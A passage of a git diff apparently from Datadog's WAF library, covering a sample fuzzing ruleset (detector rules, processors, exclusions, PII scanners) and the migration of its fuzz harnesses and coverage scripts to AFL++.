"signed_number", + "value": -1 + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-unsigned-int-rule", + "name": "Unsigned integer equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 0 + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-bool-rule", + "name": "Boolean equality matching", + "tags": { + "type": "security_scanner", + "category": "boolean_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.session_id" + } + ], + "type": "boolean", + "value": true + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-float-rule", + "name": "Float equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 3.14159 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-signed-rule", + "name": "Lower than comparison for signed integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "signed_number", + "value": 0 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-unsigned-rule", + "name": "Lower than comparison for unsigned integers", + "tags": { + "type": "security_scanner", + 
"category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 100 + } + } + ], + "on_match": ["block"] + }, + { + "id": "lower-than-float-rule", + "name": "Lower than comparison for floats", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "lower_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 10.5 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-signed-rule", + "name": "greater than comparison for signed integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "signed_number", + "value": 1000 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-unsigned-rule", + "name": "greater than comparison for unsigned integers", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "unsigned_number", + "value": 1000 + } + } + ], + "on_match": ["block"] + }, + { + "id": "greater-than-float-rule", + "name": "greater than comparison for floats", + "tags": { + "type": "security_scanner", + "category": "numeric_comparison" + }, + "conditions": [ + { + "operator": "greater_than", + "parameters": { + "inputs": [ + { + "address": 
"server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": "float", + "value": 100.5 + } + } + ], + "on_match": ["block"] + } + ], + "processors": [ + { + "id": "http-endpoint-fingerprint", + "generator": "http_endpoint_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "method": [ + { + "address": "server.request.method" + } + ], + "uri_raw": [ + { + "address": "server.request.uri_raw" + } + ], + "output": "_dd.appsec.fp.http.endpoint" + } + ] + } + }, + { + "id": "http-header-fingerprint", + "generator": "http_header_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "headers": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "output": "_dd.appsec.fp.http.header" + } + ] + } + }, + { + "id": "http-network-fingerprint", + "generator": "http_network_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "headers": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "output": "_dd.appsec.fp.http.network" + } + ] + } + }, + { + "id": "session-fingerprint", + "generator": "session_fingerprint", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "cookies": [ + { + "address": "server.request.cookies" + } + ], + "session_id": [ + { + "address": "usr.session_id" + } + ], + "user_id": [ + { + "address": "usr.id" + } + ], + "output": "_dd.appsec.fp.session" + } + ] + } + }, + { + "id": "jwt-decode", + "generator": "jwt_decode", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "jwt": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + } + ], + "output": "_dd.appsec.jwt" + } + ] + } + }, + { + "id": "jwt-decode-002", + "generator": "jwt_decode", + "conditions": [], + "parameters": 
{ + "mappings": [ + { + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + } + ], + "output": "server.request.jwt" + } + ] + }, + "evaluate": false, + "output": true + }, + { + "id": "extract-schema", + "generator": "extract_schema", + "conditions": [], + "evaluate": true, + "output": true, + "parameters": { + "mappings": [ + { + "data": [ + { + "address": "server.request.body" + } + ], + "output": "_dd.appsec.schema" + } + ] + } + }, + { + "id": "lfi-detector-rule", + "name": "Local File Inclusion Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "lfi_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.io.fs.file" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "cmdi-detector-rule", + "name": "Command Injection Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "cmdi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.request.uri_raw" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["generate_stack_action"] + }, + { + "id": "ssrf-detector-rule", + "name": "Server-Side Request Forgery Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "ssrf_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.request.uri_raw" + } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.io.net.url" + } + ] + } + } + ], + "on_match": ["redirect_action"] + }, + { + "id": "shell-command-array-rule", + "name": "Shell Command Array Detection", + "tags": { + 
"type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "shi_detector@v1", + "parameters": { + "inputs": [ + { + "address": "server.request.body", + "key_path": ["command"] + } + ] + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "cmdi-command-array-rule", + "name": "Command Injection via Array Detection", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "cmdi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.sys.exec.cmd", + "key_path": ["command"] + } + ], + "params": [ + { + "address": "server.request.query" + } + ] + } + } + ], + "on_match": ["generate_stack_action"] + } + ], + "exclusions": [ + { + "id": "health-check-exclusion", + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + } + ], + "list": ["/health", "/status", "/ping"] + } + } + ] + }, + { + "id": "rule-filter-bypass-exclusion", + "rules_target": [ + { + "rule_id": "basic-regex-rule" + } + ], + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "list": ["admin", "root", "system"] + } + } + ], + "on_match": "bypass" + }, + { + "id": "rule-filter-monitor-exclusion", + "rules_target": [ + { + "rule_id": "phrase-match-rule" + }, + { + "rule_id": "xss-detector-rule" + } + ], + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.headers.no_cookies" + } + ], + "list": ["test", "debug", "staging"] + } + } + ], + "on_match": "monitor" + }, + { + "id": "rule-filter-by-tags-exclusion", + "rules_target": [ + { + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + } + } + ], + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + } + ], + "list": ["127.0.0.1", "10.0.0.0/8", 
"192.168.0.0/16"] + } + } + ], + "on_match": "bypass" + }, + { + "id": "unconditional-rule-filter", + "rules_target": [ + { + "rule_id": "equals-string-rule" + } + ] + }, + { + "id": "input-filter-simple", + "rules_target": [ + { + "rule_id": "sqli-detector-rule" + } + ], + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ] + }, + { + "id": "input-filter-with-key-path", + "rules_target": [ + { + "rule_id": "phrase-match-word-boundary-rule" + } + ], + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["authorization"] + }, + { + "address": "server.request.cookies", + "key_path": ["session"] + } + ] + }, + { + "id": "input-filter-conditional", + "rules_target": [ + { + "rule_id": "shell-injection-rule" + } + ], + "inputs": [ + { + "address": "server.request.query" + } + ], + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "type": "string", + "value": "testuser" + } + } + ] + }, + { + "id": "input-filter-wildcard", + "rules_target": [ + { + "rule_id": "hidden-ascii-rule" + } + ], + "inputs": [ + { + "address": "server.request.headers.no_cookies", + "key_path": ["*"] + } + ] + }, + { + "id": "input-filter-nested-path", + "rules_target": [ + { + "rule_id": "lower-than-signed-rule" + } + ], + "inputs": [ + { + "address": "server.request.body", + "key_path": ["data", "user", "profile"] + } + ] + } + ], + "actions": [ + { + "id": "block_request_action", + "type": "block_request", + "parameters": { + "status_code": 403, + "type": "auto", + "grpc_status_code": 10 + } + }, + { + "id": "redirect_action", + "type": "redirect_request", + "parameters": { + "status_code": 302, + "location": "https://www.datadoghq.com" + } + }, + { + "id": "generate_stack_action", + "type": "generate_stack", + "parameters": {} + } + ], + "scanners": [ + { + "id": "email_scanner", + "key": { + "operator": "match_regex", + "parameters": { + "regex": 
"email" + } + }, + "tags": { + "type": "email", + "category": "pii" + } + }, + { + "id": "phone_scanner", + "value": { + "operator": "match_regex", + "parameters": { + "regex": "\\+?[1-9]\\d{1,14}" + } + }, + "tags": { + "type": "phone", + "category": "pii" + } + }, + { + "id": "ssn_scanner", + "key": { + "operator": "match_regex", + "parameters": { + "regex": "ssn" + } + }, + "value": { + "operator": "match_regex", + "parameters": { + "regex": "\\d{3}-\\d{2}-\\d{4}" + } + }, + "tags": { + "type": "ssn", + "category": "pii" + } + } + ], + "rules_data": [ + { + "id": "blocked_ips", + "type": "ip_with_expiration", + "data": [ + { + "value": "192.168.1.100", + "expiration": 1735689600 + }, + { + "value": "10.0.0.50", + "expiration": 1735689600 + } + ] + }, + { + "id": "blocked_users", + "type": "data_with_expiration", + "data": [ + { + "value": "baduser", + "expiration": 1735689600 + }, + { + "value": "spammer", + "expiration": 1735689600 + } + ] + } + ], + "rules_override": [ + { + "rules_target": [ + { + "rule_id": "basic-regex-rule" + } + ], + "enabled": false + }, + { + "rules_target": [ + { + "tags": { + "type": "security_scanner" + } + } + ], + "on_match": ["redirect_action"] + }, + { + "rules_target": [ + { + "tags": { + "category": "attack_attempt" + } + } + ], + "enabled": false, + "on_match": ["generate_stack_action"] + } + ], + "processors_override": [ + { + "target": [ + { + "id": "extract-schema" + } + ], + "scanners": [ + { + "id": "email_scanner" + } + ] + }, + { + "target": [ + { + "id": "jwt-decode" + } + ], + "scanners": [ + { + "tags": { + "type": "phone" + } + } + ] + }, + { + "target": [ + { + "tags": { + "type": "fingerprint" + } + } + ], + "scanners": [ + { + "id": "ssn_scanner" + } + ] + } + ] +} diff --git a/fuzzer/global/build.sh b/fuzzer/global/build.sh deleted file mode 100755 index 612b78f13..000000000 --- a/fuzzer/global/build.sh +++ /dev/null @@ -1,13 +0,0 @@ -#!/bin/bash -set -eu - -export CC=clang-17 -export CXX=clang++-17 - -rm -rf 
build && mkdir build && cd build - -cmake -DCMAKE_VERBOSE_MAKEFILE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo .. - -make -j $(nproc) global_fuzzer - -cp fuzzer/global_fuzzer ../fuzzer/global/ diff --git a/fuzzer/global/corpus/.gitkeep b/fuzzer/global/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b b/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b new file mode 100644 index 000000000..789819226 --- /dev/null +++ b/fuzzer/global/corpus/3f786850e387550fdab836ed7e6dc881de23001b @@ -0,0 +1 @@ +a diff --git a/fuzzer/global/scripts/build_corpus.py b/fuzzer/global/scripts/build_corpus.py index 11684b05f..680c62be8 100755 --- a/fuzzer/global/scripts/build_corpus.py +++ b/fuzzer/global/scripts/build_corpus.py @@ -192,22 +192,40 @@ class InitPayloadGenerator: # Arrays max sizes condition_max_count = 8 - rule_max_count = 100 - filter_max_count = 100 + rule_max_count = 20 + filter_max_count = 20 key_path_max_count = 10 - address_max_count = 16 + address_max_count = 8 transformation_max_count = 10 - ip_max_count = 100 + ip_max_count = 10 operators = [ "match_regex", + "!match_regex", "phrase_match", + "!phrase_match", "is_xss", + "!is_xss", "is_sqli", + "!is_sqli", "exact_match", - "ip_match" + "ip_match", + "greater_than", + "less_than", + "equal", + "contains", + "lfi_detector@v1", + "lfi_detector@v2", + "sqli_detector@v1", + "sqli_detector@v2", + "ssrf_detector@v1", + "shi_detector@v1", + "lfi_detector", + "sqli_detector", + "ssrf_detector", + "shi_detector" ] def __init__(self): @@ -274,8 +292,8 @@ def get_random_rule(): "id": get_random_rule_id(), "name": get_random_rule_name(), "tags": { - "type": "".join(choices(printable_chars, k=10)), - "crs_id": "".join(choices(printable_chars, k=10)), + "type": "".join(choices(printable_chars, k=5)), + "crs_id": "".join(choices(printable_chars, k=5)), }, "on_match": get_random_action_array(), "conditions": get_random_condition_array(), @@ -390,7
+408,7 @@ def get_random_condition(i): } if operator == "phrase_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] result["parameters"]["options"] = { "enforce_word_boundary": choice((True, False)) } @@ -407,17 +425,17 @@ def get_random_condition(i): } elif operator == "is_xss": # TODO: get interesting XSS patterns - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "is_sqli": # TODO: get interesting SQLI patterns - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "exact_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] elif operator == "ip_match": - result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(1, 200))] + result["parameters"]["list"] = [get_random_value(addresses) for _ in range(randint(0, 5))] return result diff --git a/fuzzer/global/scripts/clean.sh b/fuzzer/global/scripts/clean.sh index a8c9dc07c..34ae7d786 100755 --- a/fuzzer/global/scripts/clean.sh +++ b/fuzzer/global/scripts/clean.sh @@ -3,7 +3,6 @@ set -eu cd fuzzer/global -rm -rf corpus/ rm -f fuzz-*.log rm -f sample_dict.txt sample_rules.yml rm -f default.profdata default.profraw coverage.html diff --git a/fuzzer/global/scripts/show_coverage.sh b/fuzzer/global/scripts/show_coverage.sh index f58354155..5c7434067 100755 --- a/fuzzer/global/scripts/show_coverage.sh +++ b/fuzzer/global/scripts/show_coverage.sh @@ -1,15 +1,23 @@ #!/bin/bash set -eu -cd fuzzer/global 
+FUZZ_PATH=/workspace/fuzzer/build/global_fuzz +AFL_OUTPUT_DIR=/workspace/o +PROFDATA_PATH=/workspace/o/cov/lcov/default.profdata -llvm-profdata-17 merge -sparse *.profraw -o default.profdata -llvm-cov-17 show global_fuzzer -instr-profile=default.profdata -ignore-filename-regex="(vendor|fuzzer|third_party)" -format=html > coverage.html -llvm-cov-17 report -instr-profile default.profdata global_fuzzer -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false +# https://github.com/airbus-seclab/afl-cov-fast +/opt/afl-cov-fast/afl-cov-fast.py -c . -m llvm -e "$FUZZ_PATH" -b "$FUZZ_PATH" -d "$AFL_OUTPUT_DIR" -j "$(nproc)" -O + +# llvm-profdata-19 merge -sparse *.profraw -o default.profdata +llvm-cov-19 report -instr-profile="$PROFDATA_PATH" "$FUZZ_PATH" -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false + +echo "--------------------------------" +echo "You can open o/cov/web/index.html in your browser to see the coverage report in a human friendly way" +echo "--------------------------------" if [ !
-z ${1:-} ]; then THRESHOLD=$1 - TOTAL=$(llvm-cov-17 report -instr-profile default.profdata global_fuzzer -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false | grep TOTAL) + TOTAL=$(llvm-cov-19 report -instr-profile=$PROFDATA_PATH $FUZZ_PATH -ignore-filename-regex="(vendor|fuzzer|third_party)" -show-region-summary=false | grep TOTAL) ARRAY=($TOTAL) COVERAGE=$(echo ${ARRAY[3]} | sed -e "s/\.[[:digit:]]*%//g") diff --git a/fuzzer/global/src/interface.cpp b/fuzzer/global/src/interface.cpp index 8adec50c5..beb3814de 100644 --- a/fuzzer/global/src/interface.cpp +++ b/fuzzer/global/src/interface.cpp @@ -10,6 +10,7 @@ #include #include +#include "embedded_rules.hpp" #include "helpers.hpp" #include "interface.hpp" @@ -84,7 +85,11 @@ ddwaf_handle init_waf() {R"((p(ass)?w(or)?d|pass(_?phrase)?|secret|(api_?|private_?|public_?)key)|token|consumer_?(id|key|secret)|sign(ed|ature)|bearer|authorization)", R"(^(?:\d[ -]*?){13,16}$)"}, ddwaf_object_free}; - ddwaf_object rule = file_to_object("sample_rules.yml"); + + // Use embedded YAML instead of loading from file + YAML::Node doc = YAML::Load(std::string{embedded_rules::sample_rules_yaml}); + ddwaf_object rule = doc.as(); + ddwaf_object ruleset_info; ddwaf_handle handle = ddwaf_init(&rule, &config, &ruleset_info); ddwaf_object_free(&rule); diff --git a/fuzzer/global/src/main.cpp b/fuzzer/global/src/main.cpp index 9b053a0d0..8d4e1e3c0 100644 --- a/fuzzer/global/src/main.cpp +++ b/fuzzer/global/src/main.cpp @@ -15,6 +15,7 @@ #include #include +#include "../common/afl_wrapper.hpp" #include "helpers.hpp" #include "interface.hpp" #include "object_builder.hpp" @@ -127,3 +128,6 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) runner->push(args, ephemeral, timeLeftInUs); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("global_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git 
a/fuzzer/http_endpoint_fingerprint/corpus/.gitkeep b/fuzzer/http_endpoint_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_endpoint_fingerprint/src/main.cpp b/fuzzer/http_endpoint_fingerprint/src/main.cpp index a6dc9fb81..790bfbabd 100644 --- a/fuzzer/http_endpoint_fingerprint/src/main.cpp +++ b/fuzzer/http_endpoint_fingerprint/src/main.cpp @@ -2,22 +2,31 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create query object ddwaf_object query; ddwaf_object_map(&query); auto query_size = buffer.get(); @@ -29,6 +38,7 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) &query, key.data(), key.size(), ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create body object ddwaf_object body; ddwaf_object_map(&body); auto body_size = buffer.get(); @@ -40,17 +50,24 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) &body, key.data(), key.size(), ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP endpoint fingerprint processor http_endpoint_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor 
processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, buffer.get()}, {{}, {}, false, buffer.get()}, {{{}, {}, false, &query}}, {{{}, {}, false, &body}}, cache, deadline); + // Clean up ddwaf_object_free(&query); ddwaf_object_free(&body); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_endpoint_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/http_header_fingerprint/corpus/.gitkeep b/fuzzer/http_header_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_header_fingerprint/src/main.cpp b/fuzzer/http_header_fingerprint/src/main.cpp index 6eaa50430..5cba69531 100644 --- a/fuzzer/http_header_fingerprint/src/main.cpp +++ b/fuzzer/http_header_fingerprint/src/main.cpp @@ -2,27 +2,37 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. 
+#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" +#include #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { static std::array headers{"referer", "connection", "accept-encoding", "content-encoding", "cache-control", "accept-charset", "content-type", "accept-language", "x-forwarded-for", "x-real-ip", "x-client-ip", "forwarded-for", "x-cluster-client-ip", "fastly-client-ip", "cf-connecting-ip", "cf-connecting-ipv6", "user-agent"}; - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create header object ddwaf_object header; ddwaf_object_map(&header); auto header_size = buffer.get(); @@ -39,14 +49,21 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP header fingerprint processor http_header_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, &header}, cache, deadline); + // Clean up ddwaf_object_free(&header); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_header_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/http_network_fingerprint/corpus/.gitkeep b/fuzzer/http_network_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_network_fingerprint/src/main.cpp 
b/fuzzer/http_network_fingerprint/src/main.cpp index a7c14a9b1..4a98fd5a9 100644 --- a/fuzzer/http_network_fingerprint/src/main.cpp +++ b/fuzzer/http_network_fingerprint/src/main.cpp @@ -2,26 +2,36 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" +#include #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { static std::array headers{"x-forwarded-for", "x-real-ip", "x-client-ip", "forwarded-for", "x-cluster-client-ip", "fastly-client-ip", "cf-connecting-ip", "cf-connecting-ipv6"}; - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create header object ddwaf_object header; ddwaf_object_map(&header); auto header_size = buffer.get(); @@ -38,14 +48,21 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP network fingerprint processor http_network_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, &header}, cache, deadline); + // Clean up ddwaf_object_free(&header); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_network_fingerprint_fuzz", 
LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/jwt_decode/src/main.cpp b/fuzzer/jwt_decode/src/main.cpp index 7ecab16d2..a46eb2e97 100644 --- a/fuzzer/jwt_decode/src/main.cpp +++ b/fuzzer/jwt_decode/src/main.cpp @@ -2,27 +2,39 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/jwt_decode.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - ddwaf_object tmp; + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + // Create ddwaf objects + ddwaf_object tmp; ddwaf_object headers; ddwaf_object_map(&headers); + + // Add authorization header with fuzzer input ddwaf_object_map_add(&headers, "authorization", - ddwaf_object_stringl(&tmp, reinterpret_cast(bytes), size)); + ddwaf_object_stringl(&tmp, reinterpret_cast(data), size)); + // Create JWT decode processor jwt_decode gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; static const std::vector key_path{"authorization"}; @@ -30,8 +42,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) gen.eval_impl({.address = {}, .key_path = key_path, .ephemeral = false, .value = &headers}, cache, deadline); + // Clean up ddwaf_object_free(&headers); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("jwt_decode_fuzz", 
LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/lfi_detector/corpus/.gitkeep b/fuzzer/lfi_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/lfi_detector/src/main.cpp b/fuzzer/lfi_detector/src/main.cpp index c94046bfd..f649e072c 100644 --- a/fuzzer/lfi_detector/src/main.cpp +++ b/fuzzer/lfi_detector/src/main.cpp @@ -2,130 +2,65 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "condition/lfi_detector.hpp" +#include using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); - -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) -{ - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; -} - template std::vector gen_param_def(Args... 
